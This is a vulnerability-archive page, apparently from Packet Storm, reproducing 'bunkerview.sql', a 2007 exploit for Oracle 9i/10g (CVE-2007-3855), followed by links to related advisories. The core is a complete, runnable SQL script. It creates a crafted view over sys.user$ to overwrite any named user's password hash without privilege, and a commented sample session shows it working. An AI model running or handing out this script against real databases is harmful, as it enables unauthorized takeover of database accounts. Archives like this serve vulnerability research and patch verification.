Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAndrea PurificatoPACKETSTORM:57886
HistoryJul 20, 2007 - 12:00 a.m.

bunkerview.txt

2007-07-2000:00:00
Andrea Purificato
packetstormsecurity.com
26

0.938 High

EPSS

Percentile

98.9%

JSON
`--  
-- bunkerview.sql   
--  
-- Oracle 9i/10g - evil view exploit (CVE-2007-3855)  
-- Uses evil view to perform unauthorized password update  
--  
-- by Andrea "bunker" Purificato - http://rawlab.mindcreations.com  
-- 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2  
--  
-- This code should be used only for LEGAL purpose!  
-- ...and remember: use Oracle at your own risk ;-)  
--  
-- Thanks to security researchers all around the world...  
-- Smarties rules (they know what I mean)! ;-D  
--  
--  
-- SQL> select * from user_sys_privs;  
--   
-- USERNAME PRIVILEGE ADM  
-- ------------------------------ ---------------------------------------- ---  
-- TEST CREATE VIEW NO  
-- TEST CREATE SESSION NO  
--  
-- SQL> select password from sys.user$ where name='TEST';  
--  
-- PASSWORD  
-- ------------------------------  
-- AAAAAAAAAAAAAAAA  
--   
-- SQL> @bunkerview  
-- [+] bunkerview.sql - Evil view exploit for Oracle 9i/10g (CVE-2007-3855)  
-- [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com  
-- [+] 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2  
--   
-- Target username (default TEST):  
--   
-- View created.  
--   
-- old 1: update bunkerview set password='6D9FEAAB597EF01B' where name='&the_user'  
-- new 1: update bunkerview set password='6D9FEAAB597EF01B' where name='TEST'  
--   
-- 1 row updated.  
--   
--   
-- View dropped.  
--   
--   
-- Commit complete.  
--   
-- SQL> select password from sys.user$ where name='TEST';  
--   
-- PASSWORD  
-- ------------------------------  
-- 6D9FEAAB597EF01B  
--  
set serveroutput on;  
prompt [+] bunkerview.sql - Evil view exploit for Oracle 9i/10g (CVE-2007-3855)  
prompt [+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com  
prompt [+] 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2  
prompt   
undefine the_user;  
accept the_user char prompt 'Target username (default TEST): ' default 'TEST';  
create or replace view bunkerview as   
select x.name,x.password from sys.user$ x left outer join sys.user$ y on x.name=y.name;  
update bunkerview set password='6D9FEAAB597EF01B' where name='&the_user';  
drop view bunkerview;  
commit;  
`

Related

exploitpack 2
openvas 1
checkpoint_advisories 1
seebug 3
cve 1
prion 1
exploitdb 2
securityvulns 1
nessus 1
exploitpack
exploitpack
Oracle Database - SQL Compiler Views Unauthorized Manipulation
2007-07-12 00:00:00
Oracle 9i10g - Evil Views Change Passwords
2007-07-19 00:00:00
openvas
openvas
Oracle Database Server Multiple Components Multiple Vulnerabilities
2011-12-07 00:00:00
checkpoint_advisories
checkpoint_advisories
Oracle Database SQL Compiler Access Control Security Bypass (CVE-2007-3855)
2010-06-27 00:00:00
seebug
seebug
Oracle 9i/10g Evil Views - Change Passwords Exploit
2014-07-01 00:00:00
Oracle Database SQL Compiler Views Unauthorized Manipulation
2014-07-01 00:00:00
Oracle 9i/10g evil views Change Passwords Exploit (CVE-2007-3855)
2007-07-20 00:00:00
cve
cve
CVE-2007-3855
2007-07-18 19:30:00
prion
prion
Design/Logic Flaw
2007-07-18 19:30:00
exploitdb
exploitdb
Oracle 9i/10g - Evil Views Change Passwords
2007-07-19 00:00:00
Oracle Database - SQL Compiler Views Unauthorized Manipulation
2007-07-12 00:00:00
securityvulns
securityvulns
Oracle multiple security vulnerabilities
2007-07-24 00:00:00
nessus
nessus
Oracle Database Multiple Vulnerabilities (July 2007 CPU)
2011-11-16 00:00:00

0.938 High

EPSS

Percentile

98.9%

JSON
Related for PACKETSTORM:57886
exploitpack2openvas1checkpoint_advisories1seebug3cve1prion1exploitdb2securityvulns1nessus1